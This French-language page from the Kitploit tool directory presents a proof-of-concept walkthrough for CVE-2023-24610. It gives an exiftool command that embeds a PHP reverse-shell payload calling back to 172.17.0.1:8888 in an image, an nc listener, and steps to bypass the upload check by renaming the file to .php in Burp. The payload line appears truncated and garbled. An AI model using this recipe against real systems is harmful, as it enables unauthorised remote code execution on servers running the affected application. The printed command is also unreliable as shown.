Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-24610 — Ceci est une preuve de concept pour CVE-2023-24610 | Kitploit
Outils/GitHubGitHub/abbisqq/cve-2023-24610
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHubabbisqq/cve-2023-24610

CVE-2023-24610

Ceci est une preuve de concept pour CVE-2023-24610

Voir le dépôt
32il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-24610

Ceci est une preuve de concept pour CVE-2023-24610

Nous commençons par créer un fichier polyglotte en utilisant exiftool : exiftool -Comment="/dev/tcp/172.17.0.1/8888 <&1\''); ?>" avatar.png -o polyglot.php

nosh1

Nous changeons le fichier en png pour qu'il passe la vérification front-end

nosh2

Après cela, nous démarrons un écouteur nc sur le port 8888 pour recevoir le shell.

nosh3

L'étape suivante consiste à se connecter à l'application et à cliquer sur setup

nosh4

En bas de la page, nous voyons une zone de logo 'practice'. Nous pouvons télécharger un fichier en utilisant le bouton d'édition sur le côté droit

nosh5

Nous cliquons sur edit puis sur browse, nous sélectionnons le fichier “.png” que nous avons créé à la première étape

nosh6

Avant de cliquer sur upload, nous nous assurons d'intercepter la requête avec Burp ou un outil similaire. Nous cliquons sur upload et dans Burp nous changeons l'extension du fichier de “png” à “php”

nosh7

Télécharger l’outil

Nous désactivons l'interception pour que notre fichier soit téléchargé et vérifions l'écouteur nc que nous avons démarré auparavant. Nous avons un reverse shell et l'IP pointe vers notre conteneur Docker.

nosh8